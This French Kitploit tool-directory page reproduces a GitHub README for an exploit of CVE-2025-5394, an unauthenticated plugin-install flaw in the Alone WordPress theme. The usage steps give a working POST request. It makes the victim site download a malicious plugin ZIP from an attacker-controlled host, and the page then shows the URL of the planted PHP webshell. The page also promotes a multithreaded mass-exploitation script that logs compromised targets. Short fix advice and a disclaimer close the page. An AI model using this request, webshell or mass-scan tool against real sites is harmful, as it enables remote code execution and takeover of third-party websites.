Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-5394 — Alone – Thème WordPress caritatif polyvalent à but non lucratif <= 7.8.3 - Absence d'autorisation permettant le téléchargement arbitraire de fichiers non authentifié via l'installation de plugins | Kitploit
Outils/GitHubGitHub/yucaerin/cve-2025-5394
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubyucaerin/cve-2025-5394

CVE-2025-5394

Alone – Thème WordPress caritatif polyvalent à but non lucratif <= 7.8.3 - Absence d'autorisation permettant le téléchargement arbitraire de fichiers non authentifié via l'installation de plugins

Voir le dépôt
131il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-5394 – Thème WordPress Alone <= 7.8.3 - Téléchargement arbitraire de fichier non authentifié via l'installation de plugin

🔥 Résumé de la vulnérabilité
Le thème WordPress Alone versions <= 7.8.3 est vulnérable à une vulnérabilité de téléchargement arbitraire de fichier non authentifié. Cette faille permet à des attaquants non authentifiés de télécharger et d'installer des fichiers ZIP de plugins arbitraires depuis des URL distantes via un point de terminaison AJAX non protégé — entraînant une exécution de code à distance (RCE) en déployant des plugins malveillants.

Cette vulnérabilité provient de la fonction beplus_import_pack_install_plugin exposée publiquement via wp_ajax_nopriv_ sans aucune vérification d'authentification ou de capacité. La fonction installe et active un plugin à partir d'une URL fournie par l'utilisateur.

🔍 Thème concerné

  • Nom du thème : Alone – Thème WordPress caritatif polyvalent à but non lucratif
  • Version concernée : <= 7.8.3
  • Type de vulnérabilité : Téléchargement arbitraire de fichier non authentifié → RCE
  • CVE ID : CVE-2025-5394
  • Score CVSS : 9.8 (Critique)
  • Impact : Exécution complète de code à distance (RCE) et compromission totale du site

🧪 Fonctionnalités de l'exploit

  • 🔓 Aucune authentification requise
  • 📦 Télécharge un ZIP de plugin malveillant directement depuis une URL distante
  • 🚀 Installe et active automatiquement le plugin
  • 🐚 Livraison de webshell prise en charge via PHP intégré dans le plugin
  • ✅ Point de terminaison AJAX accessible par les utilisateurs non authentifiés : /wp-admin/admin-ajax.php?action=beplus_import_pack_install_plugin

🧠 Chercheur

  • Crédit : Thai An

🚀 Utilisation

  1. Préparez un fichier ZIP de plugin malveillant hébergé sur un serveur que vous contrôlez.

    • Doit contenir un en-tête de plugin valide (Plugin Name:) et une backdoor PHP (par exemple bk.php)
  2. Construisez la requête POST suivante :

    root@kitploit:~
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: victim.com
    Content-Type: application/x-www-form-urlencoded
    
    action=beplus_import_pack_install_plugin&
    data[plugin_slug]=hello-dolly&
    data[plugin_source]=https://attacker.com/hello-dolly.zip
    
  3. En cas de succès, le plugin est installé et activé. Accédez à votre shell à l'adresse :

    root@kitploit:~
    https://victim.com/wp-content/plugins/hello-dolly/bk.php?cmd=id
    

🧰 Script d'exploitation de masse Ce dépôt inclut un outil d'exploitation de masse avec :

  • Traitement multi-thread
  • Ajout automatique du préfixe HTTPS (si manquant)
  • Journalisation en direct des cibles réussies dans result.txt

Voir mass_beplus_exploit.py pour plus de détails.

🛠 Recommandations de correctif

  • Les auteurs du thème doivent supprimer ou sécuriser le crochet wp_ajax_nopriv_beplus_import_pack_install_plugin.
  • Implémenter des vérifications d'authentification/capacité (par exemple current_user_can('install_plugins'))
  • Valider et restreindre les sources des plugins.
  • Utiliser un pare-feu d'application Web (WAF) pour bloquer les accès non autorisés à admin-ajax.

🔒 Avertissement :
Ces informations sont fournies uniquement à des fins éducatives et de tests de sécurité autorisés. L'accès ou l'utilisation non autorisée de systèmes informatiques est illégal et contraire à l'éthique.

📚 Référence :

  • Avis de Wordfence – CVE-2025-5394

CVE: CVE-2025-5394
Chercheur : Thai An

Télécharger l’outil